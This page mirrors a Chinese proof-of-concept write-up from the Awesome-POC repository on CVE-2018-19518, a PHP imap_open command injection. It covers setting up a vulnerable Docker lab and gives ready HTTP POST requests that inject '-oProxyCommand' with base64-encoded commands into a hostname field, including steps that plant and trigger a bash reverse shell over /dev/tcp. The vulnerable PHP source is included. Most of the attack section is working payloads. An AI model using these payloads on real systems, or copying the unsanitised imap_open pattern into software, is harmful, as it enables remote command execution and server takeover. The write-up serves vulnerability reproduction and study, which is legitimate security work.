admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/开发语言漏洞/PHP imap 远程命令执行漏洞 CVE-2018-19518.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

147 lines
5.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# PHP imap 远程命令执行漏洞 CVE-2018-19518
## 漏洞描述
php imap 扩展用于在 PHP 中执行邮件收发操作。其 `imap_open` 函数会调用 rsh 来连接远程 shell而 debian/ubuntu 中默认使用 ssh 来代替 rsh 的功能(也就是说,在 debian 系列系统中,执行 rsh 命令实际执行的是 ssh 命令)。
因为 ssh 命令中可以通过设置 `-oProxyCommand=` 来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。
参考链接:
- https://bugs.php.net/bug.php?id=77153
- https://github.com/Bo0oM/PHP_imap_open_exploit
- https://antichat.com/threads/463395/#post-4254681
- https://nvd.nist.gov/vuln/detail/CVE-2018-19518
## 环境搭建
Vulhub 执行如下命令启动一个包含漏洞的 PHP 环境:
```
docker compose up -d
```
环境启动后,访问 `http://your-ip:8080` 即可查看 web 页面。Web 功能是测试一个邮件服务器是否能够成功连接,需要填写服务器地址、用户名和密码。
目标源码为 index.php
## 漏洞复现
发送如下数据包即可成功执行命令 `echo '1234567890'>/tmp/test0001`
```
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222
```
![](images/PHP%20imap%20远程命令执行漏洞%20CVE-2018-19518/image-20240529090507711.png)
执行 `docker compose exec web bash` 进入容器,可见 `/tmp/test0001` 已成功创建:
![](images/PHP%20imap%20远程命令执行漏洞%20CVE-2018-19518/image-20240529090441656.png)
写入反弹 shell
```bash
# Payload
echo "/bin/bash -i >& /dev/tcp/127.0.0.1/8888 0>&1" > /tmp/a
# Base64 Encode
ZWNobyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjEiID4gL3RtcC9h
# URL Encode
ZWNobyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA%2bJjEiID4gL3RtcC9h
# 组装Payload
# hostname=x+-oProxyCommand%3decho%09[PAYLOAD]|base64%09-d|sh}&username=111&password=222
hostname=x+-oProxyCommand%3decho%09ZWNobyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA%2bJjEiID4gL3RtcC9h|base64%09-d|sh}&username=111&password=222
```
![](images/PHP%20imap%20远程命令执行漏洞%20CVE-2018-19518/image-20240529093314892.png)
触发反弹 shell
```shell
# Payload
/bin/bash /tmp/a
# Base64 Encode
L2Jpbi9iYXNoIC90bXAvYQ==
# URL Encode
L2Jpbi9iYXNoIC90bXAvYQ%3d%3d
# 组装Payload
# hostname=x+-oProxyCommand%3decho%09[PAYLOAD]|base64%09-d|sh}&username=111&password=222
hostname=x+-oProxyCommand%3decho%09L2Jpbi9iYXNoIC90bXAvYQ%3d%3d|base64%09-d|sh}&username=111&password=222
```
![](images/PHP%20imap%20远程命令执行漏洞%20CVE-2018-19518/image-20240529093903859.png)
### index.php
```php
<?php
if(!empty($_POST)) {
$imap = @imap_open('{'.$_POST['hostname'].':993/imap/ssl}INBOX', $_POST['username'], $_POST['password']);
}
?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha256-eSi1q2PG6J7g7ib17yAaWMcrr5GrtohYChqibrV7PBE=" crossorigin="anonymous">
<title>Input your email server</title>
</head>
<body>
<div class="container">
<h2>Test your email server</h2>
<?php if(!empty($_POST)): ?>
<?php if($imap): ?>
<div class="alert alert-success" role="alert">
Connect successful!
</div>
<?php else: ?>
<div class="alert alert-danger" role="alert">
Connect failed!
</div>
<?php endif; ?>
<?php endif; ?>
<form method="post">
<div class="form-group">
<label>Server address</label>
<input type="text" name="hostname" class="form-control" >
</div>
<div class="form-group">
<label>Username</label>
<input type="text" name="username" class="form-control" >
</div>
<div class="form-group">
<label>Password</label>
<input type="password" class="form-control" name="password">
</div>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
</div>
<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.4/dist/umd/popper.min.js" integrity="sha256-EGs9T1xMHdvM1geM8jPpoo8EZ1V1VRsmcJz8OByENLA=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha256-VsEqElsCHSGmnmHXGQzvoWjWwoznFSZc6hs7ARLRacQ=" crossorigin="anonymous"></script>
</body>
</html>
```
Reference in New Issue View Git Blame Copy Permalink